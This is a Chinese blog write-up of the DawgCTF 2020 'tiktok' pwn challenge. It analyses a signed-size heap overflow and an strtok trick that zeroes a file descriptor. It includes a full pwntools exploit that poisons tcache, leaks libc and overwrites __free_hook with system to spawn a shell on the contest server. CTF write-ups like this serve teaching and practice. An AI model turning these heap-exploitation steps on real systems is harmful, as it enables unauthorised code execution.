DawgCTF2020国际赛pwn之tiktok

最新推荐文章于 2024-04-08 17:47:27 发布
最新推荐文章于 2024-04-08 17:47:27 发布
阅读量670 收藏
点赞数 2
分类专栏: CTF pwn 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/105520095
版权
CTF 同时被 3 个专栏收录
161 篇文章 9 订阅
订阅专栏
pwn
161 篇文章 24 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

tiktok

这是DawgCTF 2020国际赛的一题,作为一血所得者,还是很高兴的。

首先,检查一下程序的保护机制,发现没开PIE

然后,我们用IDA分析一下,import_song函数打开文件描述符,然后存储在路径的后面那个空间

Play_song函数从打开的文件描述符里读取数据,申请的堆大小为nbytes+1,然后从文件里读取数据存入堆里,并打印出来。

Remove_song函数清除该歌曲的信息

第一个漏洞点在于play_song函数里存在一个整数符号的问题

nbytes为有符号数据,因此成功nbytes的值为-1,0那么buf = malloc(0),而read则是read(fd,buf,-1);由此造成了堆溢出。然而,fd是已经存在的文件的文件描述符,显然nbytes不能直接被控制,read的内容也不能直接控制。因此,还需要第二个漏洞才可以完成利用。

通过调试,我们可以知道,文件描述符fd存储在songs后面。

而strtok会以指定的字符来分隔字符串,其分隔原理就是将指定的字符替换为\0

最开始用户可以输入长度为0x18的文件名,而songs+0x18正好是fd的位置。

如果,我们的文件名里不包含.号,而fd的值正好为46的时候,由于字符串以\0结尾,所以fd也被算入字符串里,strtok(0,’.’)就会将fd设置为0,因为46对应的ascii字符为.号。而fd被设置为0的时候,我们就可以利用第一个漏洞来溢出堆了。

Linux fd总是依次递增的,因此,我们需要先import_song n次,使得fd正好为46。然后playsongs的时候,就可以从终端输入数据,进而溢出堆。由于glibc版本为2.27,因此可以直接伪造next指针,实现任意地址分配。由于没有开启PIE,我们分配到songs数组里,控制songs数组,即可实现任意地址读,泄露地址后,再次伪造next指针分配到free_hook处,写入system地址,触发即可。

#coding:utf8
from pwn import *

libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
system_s = libc.sym['system']
elf = ELF('./tiktok')
system_got = elf.got['system']
songs = elf.symbols['songs']
#sh = process('./tiktok')
sh = remote('ctf.umbccd.io',4700)
def open_fd(path):
   sh.sendlineafter('Choice:','1')
   sh.sendlineafter('path.',path)

def add(index,size = 0,content = ''):
   sh.sendlineafter('Choice:','3')
   sh.sendlineafter('Choice:',str(index))
   if size != 0:
      sh.sendline(str(size).ljust(0x4,'\x00'))
      sh.send(content)

def delete(index):
   sh.sendlineafter('Choice:','4')
   sh.sendlineafter('Choice:',str(index))


#1
open_fd('Rainbow/godzilla.txt')
#2
open_fd('Rainbow/godzilla.txt')
#3
open_fd('Rainbow/godzilla.txt')
#使得文件描述符递增到45
for i in range(40):
   print i
   open_fd('Warrior/')
#文件描述符为46,46对应ascii字符.号,会被strtok置0,从而使得我们可以指定size,进而溢出堆
open_fd('Warrior'.ljust(0x18,'/'))

add(4)
add(5)
add(2)

add(6)
add(7)
add(8)
add(9)
add(42)
add(43)

delete(2)
delete(6)
delete(5)
delete(4)
#溢出,修改tcache的next指针指向songs+0x18,当申请到songs+0x18时,songs+0x18处会被置0
#而songs+0x18处对应的是1的fd
add(44,-1,'a'*0x10 + p64(0) + p64(0x21) + p64(songs+0x18) + 'a'*8 + p64(0) + p64(0x311) + p64(songs+0x38))
add(10)
add(11) #这里将导致songs+0x18处置零
add(3) #取出0x310的第一个chunk
#分配到songs+0x38,控制整个songs结构体数组
#2
fake_struct = p64(0)*3 + p64(4)
fake_struct += p64(songs) + p64(songs+0x8)
fake_struct += p64(system_got)
#3
fake_struct += p64(0)*3 + p64(0) #fd设置为0
fake_struct += p64(songs) + p64(songs+0x8)
fake_struct += p64(0)
#4
fake_struct += p64(0)*3 + p64(0) #fd设置为0
fake_struct += p64(songs) + p64(songs+0x8)
fake_struct += p64(0)
#5
fake_struct += p64(0)*3 + p64(0) #fd设置为0
fake_struct += p64(songs) + p64(songs+0x8)
fake_struct += p64(0)

add(1,768,fake_struct) #分配到songs+0x38
#泄露setvbuf的地址
add(2)
sh.recvuntil('\n')
system_addr = u64(sh.recv(6).ljust(8,'\x00'))
libc_base = system_addr - system_s
free_hook_addr = libc_base + libc.symbols['__free_hook']
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'free_hook_addr=',hex(free_hook_addr)
#向tcache bin里放两个0x20的chunk
delete(43)
delete(42)
#将42代表的chunk申请到3,这样可以和前面一样的道理来溢出,修改43的next指针
add(3,-1,'/bin/sh'.ljust(0x10,'\x00') + p64(0) + p64(0x21) + p64(free_hook_addr))
add(4,-1,'a')
#写free_hook
add(5,-1,p64(system_addr))
#getshell
delete(3)

sh.interactive()

 

ha1vk
关注
专栏目录
CTF哥斯拉冰蝎解码工具
02-23
承影_哥斯拉冰蝎解码工具1.1版本,助力CTF
2020SCTF——PWN snake
baidu_36110484的博客
07-15 383
0x00 背景 今年SCTF上的一道PWN题,难度还行,关键是要大概读懂程序,找到可利用的漏洞。由于比环境使用的是libc2.23,我为了复现也搞了一个ubuntu16.04的虚拟机(也是libc2.23)。这样搞fastbin利用比较方便。最后在libc的小版本上还是有一点出入,不过,问题不大。 0x01 源码分析 while ( 1 ) { v10 = 0; v13 = 60; v14 = 4; v11 = 0; v12 = 1; dword_603
手把手教你写纯字符ascii shellcode——最通俗易懂的alphanumeric shellcode生成指南
HiTaQini
05-31 5571
ascii shellcode : 自动生成shellcode,手写shellcode
攻击工具分析:哥斯拉(Godzilla)
wangluoanquan111的博客
08-19 1246
对,你没有看错,本期我们要研究的目标是哥斯拉。[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oafeRjkq-1692333362279)(https://image.3001.net/images/20210709/1625812505_60e7ee19253ce63efdfc1.png!small)]不过,此哥斯拉非彼哥斯拉,他是继菜刀、蚁剑、冰蝎之后具有更多优点的Webshell管理工具,由java语言开发,如名称一样,他的“凶猛”之处主要体现在:
CTF工具使用汇总
qq_47804678的博客
12-20 4717
做题很多的时候都会用到工具,我现在也来简单汇总一下我现在用到过的工具,很多都可以在github或者CTFHUB上直接下载到。
哥斯拉还原加密流量
热门推荐
u011250160的博客
09-28 1万+
感谢大佬的文章:哥斯拉Godzilla加密流量分析 首先在自己的网站上上传个马 设置好代理,方便burp抓包 注意以下为PHP_XOR_BASE64加密的数据包 一共抓到了三个包 第一个包 第二个包 第三个包 第一个包 Request解密脚本 <?php function encode($D,$K){ for($i=0;$i<strlen($D);$i++){ $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c;
Bugku S3 AWD排位-9 pwn二进制
08-27
Bugku S3 AWD排位-9 pwn二进制
2020 蓝帽杯线下PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下中的一个Pwn题目进行的WriteUp(解题报告)。Pwn类题目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
ctf中收集的pwn,并制作write-up。.zip
09-30
项目源码
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
CTF常用工具汇总
最新发布
Cairo_A的博客
04-08 1660
​ 做题很多的时候都会用到工具,我现在也来简单汇总一下我现在用到过的工具,很多都可以在github或者CTFHUB上直接下载到。 ​
2022红队必备工具列表总结
weixin_46211944的博客
07-31 2679
一款适用于以HVV行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如Title、Domain、CDN、指纹信息、状态信息等。Railgun为一款GUI界面的渗透工具,将部分人工经验转换为自动化,集成了渗透过程中常用到的一些功能,目前集成了端口扫描、端口爆破、web指纹扫描、漏洞扫描、利用以及编码转换功能。一款web漏洞扫描和验证工具。...
IDA的使用
南宫封清的博客
09-12 3453
简介 ida可以分析的文件格式也非常多 包括windows下的pe格式文件(.exe .dll .sys)linux 下的elf文件(.elf .so )mac系统的常见文件格式,以及一些不常见到系统的文件格式。 ida的功能强大,对于一般的无壳保护,无混淆代码的程序ida能直接反汇编出位代码(F5快捷键),在一定程度上减少了逆向分析的难度和门槛。 ida分为32位和64位,在进行逆向分析时选择32-bit IDA分析32位程序,64-bit IDA 分析64位程序。 一般来说直接ok打开,ida会帮你
如何在IDA软件中找到自己需要的目标函数(关键函数)
半岛铁盒的博客
11-30 1万+
这个问题很困扰我们这些初学者 特此记录~~~ 一. 提前要记住IDA的基操~~ 1.shift+F12 查看string信息 (通常可以看到重要的信息 ) 2.Alt + T 查找带有目标字符串的函数 3. F5 查看 C代码 4. Ctrl + F 在函数框中 搜索函数 5. 空格键 流程图与代码 来回切换. 二.讲解 从题目下下载好附件后在IDA中打开,发现没有main函数(即关键代码所在的函数); 这时候我们按 Ctrl + F12 看到了flag, wrong, 但是发现了一个
2020 DawgCTF Re WP
Hk_Mayfly的博客
04-14 665
题目附件:https://lanzous.com/ibdyfxg Ask Nicely 直接IDA打开,找到flag函数,拼写出了就行 DawgCTF{+h@nk_Y0U} Put your thang down flip it and reverse it 代码分析 IDA打开函数 __int64 __fastcall main(__int64 a1, char...
DawgCTF wp(re和crypto)
YenKoc的博客
04-12 566
简单写写思路,想看详解的。。我脚本有些丢失了。。师傅请移步。 挂了个vpn,算正式打这种国际,全是英文。上去打了两天,昨晚晚上划水了一晚上补作业。。。,re那时候写出来三道,Potentially Eazzzy这题是真的坑,不知道是不是我环境问题,本地都过了,服务器死活过不去。。。白给了250分。第三题,讲道理很懵逼,动态进去,不知道里面函数是干啥的。。看了一下午汇编,没结果。。刚刚看了大佬的w...
vulnhub-kir-Ctf
HEAVEN569的博客
02-14 831
下载靶机kir-Ctf https://www.vulnhub.com/entry/kira-ctf,594/ 打开靶机, 把这个靶机的虚拟网卡删除 ,再添加回来 1.信息收集 1.首先把靶机设为net 模式。 使用nmap 扫描靶机 因为nat模式的网络地址范围为;192.168.248.0 -244 nmap -sV -v 192.168.248.0/24 //扫描网段存活 的ip 发现 存活的ip 为 192.168.248.134 2.再对 19...
GACTF2020 misc_crymisc
PushSafe
09-01 1083
GACTF2020 misc_crymisc 本人刚开始打ctf不久,希望各位师傅能对此文章提出宝贵的建议。 题目地址. 题目文件下载。866h 下载好的文件为:crymisc.docx 打开后显示报错,考虑将docx转换为zip文件查看docx文件里面的内容: 发现题目要求的文件打开3.jpg报错并提示密码错误,这时考虑zip伪加密 找到加密位置 改为00即可。 奇怪的知识又增加了: zip文件头信息 标准开头:50 4B 03 04 解压pkware版本:14 00 全局方式位标记: 00 00
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值